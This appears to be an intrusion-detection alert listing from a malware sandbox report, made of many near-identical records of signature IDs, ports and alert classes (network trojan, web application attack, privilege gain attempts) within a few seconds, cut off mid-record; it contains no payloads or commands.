              Timestamp:06/10/24-15:37:59.967169
              SID:2835222
              Source Port:36602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.235344
              SID:2835222
              Source Port:51868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.022039
              SID:2829579
              Source Port:48046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.028419
              SID:2835222
              Source Port:42996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.181988
              SID:2030092
              Source Port:39736
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.926044
              SID:2835222
              Source Port:44436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.793700
              SID:2835222
              Source Port:44336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.966319
              SID:2835222
              Source Port:41788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.495900
              SID:2829579
              Source Port:54566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.195818
              SID:2030092
              Source Port:45542
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.911966
              SID:2835222
              Source Port:33880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.017007
              SID:2829579
              Source Port:41972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.503623
              SID:2829579
              Source Port:36608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.762083
              SID:2829579
              Source Port:59392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.935900
              SID:2835222
              Source Port:38508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.259448
              SID:2829579
              Source Port:58672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.929860
              SID:2829579
              Source Port:33796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.094682
              SID:2025883
              Source Port:41156
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.705525
              SID:2829579
              Source Port:49644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.023435
              SID:2829579
              Source Port:56786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.248014
              SID:2829579
              Source Port:34566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.719824
              SID:2829579
              Source Port:37502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.962047
              SID:2835222
              Source Port:56114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.164438
              SID:2829579
              Source Port:48850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.226767
              SID:2829579
              Source Port:33888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.084446
              SID:2025883
              Source Port:43700
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.709297
              SID:2829579
              Source Port:33708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.745716
              SID:2835222
              Source Port:45604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.857260
              SID:2835222
              Source Port:52206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.128991
              SID:2030092
              Source Port:44504
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.731556
              SID:2835222
              Source Port:54960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.751686
              SID:2835222
              Source Port:53884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.734955
              SID:2835222
              Source Port:57338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.648657
              SID:2835222
              Source Port:44284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.664556
              SID:2835222
              Source Port:42468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.224097
              SID:2835222
              Source Port:47094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.810751
              SID:2829579
              Source Port:53740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.979091
              SID:2829579
              Source Port:45156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.615090
              SID:2829579
              Source Port:52872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.200766
              SID:2030092
              Source Port:55206
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.252788
              SID:2030092
              Source Port:44368
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.102548
              SID:2030092
              Source Port:41406
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.219305
              SID:2030092
              Source Port:33066
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.907506
              SID:2829579
              Source Port:51602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.991203
              SID:2829579
              Source Port:52860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.205893
              SID:2835222
              Source Port:36610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.241705
              SID:2030092
              Source Port:50282
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.268090
              SID:2829579
              Source Port:59132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.488949
              SID:2829579
              Source Port:38910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.161714
              SID:2030092
              Source Port:50788
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.984293
              SID:2835222
              Source Port:52668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.863643
              SID:2030092
              Source Port:43232
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.852064
              SID:2030092
              Source Port:45994
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.150981
              SID:2030092
              Source Port:42214
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.107053
              SID:2030092
              Source Port:49634
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.189189
              SID:2030092
              Source Port:54590
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.649435
              SID:2835222
              Source Port:44504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.211497
              SID:2835222
              Source Port:45922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.739622
              SID:2835222
              Source Port:58650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.781625
              SID:2835222
              Source Port:39322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.833827
              SID:2030092
              Source Port:51492
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.914938
              SID:2829579
              Source Port:59818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.688716
              SID:2829579
              Source Port:42320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.769858
              SID:2025883
              Source Port:39338
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.165713
              SID:2829579
              Source Port:36522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.765712
              SID:2835222
              Source Port:42732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.774510
              SID:2030092
              Source Port:54128
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.261737
              SID:2030092
              Source Port:32990
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.177787
              SID:2030092
              Source Port:54386
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.791154
              SID:2835222
              Source Port:34792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.233672
              SID:2829579
              Source Port:59904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.187605
              SID:2829579
              Source Port:46806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.178071
              SID:2835222
              Source Port:44078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.500162
              SID:2829579
              Source Port:43270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.683936
              SID:2829579
              Source Port:59854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.925765
              SID:2829579
              Source Port:55820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.868091
              SID:2835222
              Source Port:40972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.225181
              SID:2030092
              Source Port:51454
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.758232
              SID:2025883
              Source Port:43434
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.650837
              SID:2829579
              Source Port:42044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.645712
              SID:2829579
              Source Port:43262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.655152
              SID:2829579
              Source Port:48126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.266123
              SID:2835222
              Source Port:37370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.210637
              SID:2829579
              Source Port:50210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.222372
              SID:2829579
              Source Port:57074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.932450
              SID:2835222
              Source Port:33406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.847965
              SID:2829579
              Source Port:46436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.185648
              SID:2030092
              Source Port:38838
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.002137
              SID:2829579
              Source Port:54402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.962891
              SID:2829579
              Source Port:58138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.921767
              SID:2835222
              Source Port:37950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.862278
              SID:2030092
              Source Port:43590
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.096206
              SID:2030092
              Source Port:35516
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.151592
              SID:2030092
              Source Port:42566
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.843717
              SID:2829579
              Source Port:50194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.116834
              SID:2030092
              Source Port:37242
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.878023
              SID:2835222
              Source Port:59264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.637710
              SID:2829579
              Source Port:50306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.824955
              SID:2030092
              Source Port:48068
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.021324
              SID:2835222
              Source Port:51562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.674620
              SID:2835222
              Source Port:54890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.208966
              SID:2829579
              Source Port:42074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.869779
              SID:2835222
              Source Port:58204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.255540
              SID:2030092
              Source Port:36482
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.199727
              SID:2829579
              Source Port:35058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.039932
              SID:2829579
              Source Port:38456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.229242
              SID:2030092
              Source Port:56118
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.274014
              SID:2835222
              Source Port:59706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.980839
              SID:2835222
              Source Port:35420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.002985
              SID:2829579
              Source Port:34412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.254862
              SID:2030092
              Source Port:37108
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.945412
              SID:2829579
              Source Port:53768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.691059
              SID:2835222
              Source Port:53244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.730340
              SID:2835222
              Source Port:34008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.974792
              SID:2829579
              Source Port:44740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.660067
              SID:2829579
              Source Port:60882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.949732
              SID:2829579
              Source Port:59100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.183026
              SID:2829579
              Source Port:53528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.695812
              SID:2835222
              Source Port:42650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.706858
              SID:2835222
              Source Port:54022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.262299
              SID:2829579
              Source Port:47796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.502931
              SID:2835222
              Source Port:46240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.175015
              SID:2835222
              Source Port:56568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.168829
              SID:2835222
              Source Port:60102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.952158
              SID:2835222
              Source Port:58850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.179072
              SID:2835222
              Source Port:50148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.245859
              SID:2030092
              Source Port:56832
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.037044
              SID:2835222
              Source Port:33786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.788817
              SID:2835222
              Source Port:56284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.930930
              SID:2835222
              Source Port:32834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.273128
              SID:2829579
              Source Port:42026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.840962
              SID:2835222
              Source Port:38198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.168603
              SID:2030092
              Source Port:49010
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.669182
              SID:2835222
              Source Port:36132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.641973
              SID:2829579
              Source Port:57774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.685061
              SID:2829579
              Source Port:51404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.955351
              SID:2835222
              Source Port:36294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.853487
              SID:2829579
              Source Port:37098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.990322
              SID:2835222
              Source Port:37196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.802976
              SID:2835222
              Source Port:45606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.153497
              SID:2030092
              Source Port:42924
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.786162
              SID:2829579
              Source Port:52216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.300493
              SID:2030092
              Source Port:54578
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.654413
              SID:2829579
              Source Port:54110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.838365
              SID:2025883
              Source Port:34216
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.024876
              SID:2835222
              Source Port:49654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.238848
              SID:2835222
              Source Port:56428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.210410
              SID:2030092
              Source Port:60628
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.177056
              SID:2835222
              Source Port:39800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.760581
              SID:2025883
              Source Port:35872
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:37:59.813573
              SID:2025883
              Source Port:55620
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.231962
              SID:2829579
              Source Port:49858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.807666
              SID:2829579
              Source Port:51654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.165801
              SID:2030092
              Source Port:50600
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.763209
              SID:2835222
              Source Port:43930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.715141
              SID:2829579
              Source Port:46712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.093773
              SID:2025883
              Source Port:48928
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.138778
              SID:2030092
              Source Port:39426
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.142395
              SID:2030092
              Source Port:43574
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.818135
              SID:2030092
              Source Port:40194
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.218757
              SID:2030092
              Source Port:47496
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.869779
              SID:2030092
              Source Port:56778
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.905259
              SID:2835222
              Source Port:39822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.217260
              SID:2835222
              Source Port:41384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.213146
              SID:2829579
              Source Port:44874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.830775
              SID:2835222
              Source Port:37174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.314721
              SID:2030092
              Source Port:37140
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.511176
              SID:2835222
              Source Port:56274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.268899
              SID:2829579
              Source Port:36416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.639864
              SID:2835222
              Source Port:51214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.923381
              SID:2835222
              Source Port:60882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.938715
              SID:2835222
              Source Port:45636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.205083
              SID:2030092
              Source Port:42612
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.186823
              SID:2030092
              Source Port:58402
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.186102
              SID:2835222
              Source Port:53280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.243948
              SID:2829579
              Source Port:38516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.652273
              SID:2829579
              Source Port:35332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.936119
              SID:2829579
              Source Port:47328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.702109
              SID:2829579
              Source Port:44722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.031359
              SID:2829579
              Source Port:52142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.947535
              SID:2835222
              Source Port:39894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.029895
              SID:2835222
              Source Port:33426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.509844
              SID:2829579
              Source Port:49560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.018435
              SID:2835222
              Source Port:35452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.504959
              SID:2835222
              Source Port:34860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.738142
              SID:2835222
              Source Port:44866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.196297
              SID:2829579
              Source Port:48942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.644240
              SID:2835222
              Source Port:50450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.174641
              SID:2030092
              Source Port:54940
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.107738
              SID:2030092
              Source Port:38736
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.839299
              SID:2835222
              Source Port:57412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.219730
              SID:2829579
              Source Port:46594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.831855
              SID:2835222
              Source Port:49014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.005516
              SID:2829579
              Source Port:53026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.184599
              SID:2829579
              Source Port:59998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.108388
              SID:2030092
              Source Port:58042
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.989479
              SID:2829579
              Source Port:58502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.205114
              SID:2829579
              Source Port:43116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.103189
              SID:2030092
              Source Port:54126
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.804504
